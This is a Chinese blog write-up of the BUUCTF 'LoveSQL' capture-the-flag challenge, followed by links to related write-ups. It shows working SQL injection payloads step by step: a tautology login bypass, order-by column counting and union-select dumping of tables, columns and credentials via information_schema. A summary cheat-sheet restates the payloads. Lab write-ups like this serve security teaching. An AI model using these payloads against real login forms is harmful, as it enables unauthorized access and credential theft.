第八题——[极客大挑战 2019]LoveSQL

最新推荐文章于 2022-06-22 22:41:58 发布
最新推荐文章于 2022-06-22 22:41:58 发布
阅读量229 收藏
点赞数 1
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/115373328
版权
题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,两栏输入框,使用全真语句进行测试

用户名输入a' or '1'='1密码输入b' or '1'='1,出现一个字符串,提交flag提示错误,说明这个字符串不是flag
在这里插入图片描述
在这里插入图片描述

第二步:查看是否存在堆叠注入

在用户名和密码都输入admin';show tables;发现不存在堆叠注入。
在这里插入图片描述
在这里插入图片描述

第三步:使用order by确定回显点

  1. 在用户名一栏输入1' order by 3#,密码一栏输入1,提交无异常。
    在这里插入图片描述
    在这里插入图片描述

  2. 在用户名一栏输入1' order by 4#,密码一栏输入1,提交发现异常。
    在这里插入图片描述
    在这里插入图片描述

结论:可以显示3个字段

第四步:使用union select获取数据

  1. 在用户名一栏输入1' union select 1,2,3#,密码输入1进行试探,发现在2,3点出显示数据
    在这里插入图片描述
    在这里插入图片描述

  2. 对表名进行爆破,用户名一栏输入1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#密码一栏输入1,显示出表名。
    在这里插入图片描述
    在这里插入图片描述

  3. 对字段名进行爆破,输入1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#,显示出三个字段名
    在这里插入图片描述

  4. 输入1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#显示数据,发现flag:flag{17de2610-1f0f-4623-a20a-d785d85b4279}
    在这里插入图片描述

sql语法

  1. order by 3#用于确定几个字段
  2. union select 1,2,3#用于确定回显点
  3. union select 1,2,database()#用于确定当前数据库名称
  4. union select 1,2,group_concat(schema_name) from information_schema.schemata#用于查看所有数据库名称
  5. union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#用于都确定表名
  6. 1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘l0ve1ysq1’#用于确定字段名
  7. 1’ union select 1,2,group_concat(id,username,password) from (databasename.tablename)#输出数据
想学习安全的小白
关注
专栏目录
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
buuctf 极客挑战 upload
SopRomeo的博客
01-29 3460
最近接触了文件上传漏洞,刚好可以做这个目了 普及下文件上传的漏洞: 根据一些bug可以把我们的木马文件上传进去从而达到控制服务器的目的 分享一下两位大哥文件上传漏洞的技巧以及讲解 文件上传的常见技巧 文件上传漏洞的普通技巧与讲解 这道百度了好久,才做出来 当个web狗真的难受 这道考到了文件头绕过以及js代码绕过 先看看是不是黑名单 发现phtml可行 这边我在burpsuit试了很久才试...
【BUUCTF】 [极客挑战2019] BabySQL —— 清晰易懂总结好的 Writeup
algae
08-25 978
【BUUCTF】 [极客挑战2019] BabySQL Writeup0x00 考点sql 注入 双写绕过0x01 解爆库爆表爆列 0x00 考点 sql 注入 双写绕过 replace函数,找到union和select等替换为空 双写绕过,单词中间拆开,分两半,里面藏一个完整的: union ununionion select seselectlect from frfromom where whwhereere (过滤了or) information infoorrmation 常见UR
【BUUCTF】[极客挑战 2019]Havefun 1
qq_45972928的博客
05-06 1419
主要考察对源代码的理解 1、进入网站 2、发现网页并没有什么有用的提示,观察源代码发现可能有用的判别语句 3、尝试输入?cat=dog
BUUCTF [极客挑战 2019]EasySQL
m0_49025459的博客
04-06 274
目 这啊很快奥,我就想用个永真表达式测试一次,结果一下子就出来了 admin' or '1'='1 登录
BUUCTF[极客挑战 2019]LoveSQL
楼阁de猫的博客
12-17 263
[极客挑战 2019]LoveSQL 用admin登录一下,发现用户名错误,那试一下admin’# 发现登陆成功,看到这一串数字以为有什么特别的,其实没啥用 但是能看到空格和#都是被url编码了的,这样才能有正确的回显,因此接下来的操作应该都是要对字符进行url编码的 接下来我们用SQL注入来做 1.首先查询字段数 check.php?username=admin' order by 4%23&password=111 (因为url没有自动对#进行编码,所以我们要手动输入#的url编码%23,
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
第三届 Apache Flink 极客挑战赛暨AAIG CUP——电商推荐“抱大腿”攻击识别亚军代码方案.zip
最新发布
06-23
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请...
极客挑战2020wp
Atkx's Blog
11-29 1486
Crypto 二战情报员刘壮 简介:你能知道刘壮在说什么?得到的flag包裹上SYC{} .-…/.----/…-/–…/…/…-/…-/-./–./…–.-/…/…–.-/–…/.----/-.–/.---- 提示:刘壮早上起床打摩丝 提交flag,发现错误,转换成小写还是不对,查看了一下群里给的hint,成功提交 铠甲与萨满 简介:YEI{roafnagtmroafnagtm_hgtmhgtmhgtm} 提示:kaisa? 偏移量为6时,得到flag MISC 一“页”障目 作者:lingze 简
[极客挑战 2019]BuyFlag
hao2580的博客
05-06 231
查看源代码 需要上传参数money,password 用bp抓包。
[极客挑战 2019]BuyFlag 1 writeup
dlccom的博客
04-21 308
今天又来摸鱼啦!!!!!!!!! 打开靶机到处点点,发现菜单处有个payflag页面 打开页面,有个提示 右键看一下源代码 大概意思是用POST方法提交参数password和money password不能是数字还要弱等于404,这个好解决password=404a就可以了,具体的原因是 在执行关系运算”==“时要求运算符两边的数据类型必须一致,所以如果有一方是int类型,一方是字符串类型的话,字符串类型会被强制转换为整型 那么具体怎么转换呢 1.当字符串中 以 数
CTF-Web-[极客挑战 2019]Havefun
归子莫的博客
05-02 985
CTF-Web-[极客挑战 2019]Havefun 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges Web类,[极客挑战 2019]Havefun 打开目的实例 思路 一看到这个是不是很懵逼,...
[BUUCTF]第三天训练日志
Y4tacker的博客
10-01 4007
文章目录[FBCTF2019]RCEService[BSidesCF 2019]Kookie[CISCN2019 华北赛区 Day1 Web5]CyberPunk[极客挑战 2019]Secret File[ACTF2020 新生赛]Include参考文章 [FBCTF2019]RCEService 目源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST
BUUCTF [极客挑战 2019]FinalSQL
CyhDl666的博客
03-09 334
12345都点过了 访问id=6 提示 Clever! But not this table. 这里猜测id这里存在SQL注入,而不是以前的登录框 初步判断了一下,是一个数字型注入 且过滤了一些字符 需要fuzz一下 空格被过滤掉了用() union注入这些也被过滤的差不都了 FinalSQL可以想想到应该是盲注类型的目 嘿嘿嘿 ^没有被过滤 可以在这里去搞点事情做做 目有提示是盲注 所以这种目还是跑脚本 import requests import sys import time def g.
Buuweb 极客挑战 2019PHP 1
F1or_的博客
09-07 1147
打开一看提示说有备份网站习惯,用工具扫一下发现了www.zip得到了网站备份。 得到了3个php 直接看到了flag.php打开一看 结果错误,怎么可能这么简单,orz 直接看另外两个php中的源码 index.php和class.php 一看就是反序列化 ...
BUUCTFweb部分
dogeace的博客
12-06 793
前一段时间没有发现比较基础的的平台去做,直到上个星期我发现了一个比较基础的平台供我刷,所以就继续更新wp了。废话不多说现在开始写解。 目名称[SUCTF 2019]EasySQL一级目录一级目录一级目录 [SUCTF 2019]EasySQL 先进入目 因为目的名称已经提示是SQL注入了,所以我们先进行尝试1’ or 1 = 1;# 提交发现 我当时的第一反应是布尔盲注所以我尝试了一下判断数据库的名称构造如下的payload 1' or (ascii(substr(database(),1,
[极客挑战 2019]LoveSQL
mafucan的博客
06-22 260
SQL注入流程记录
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值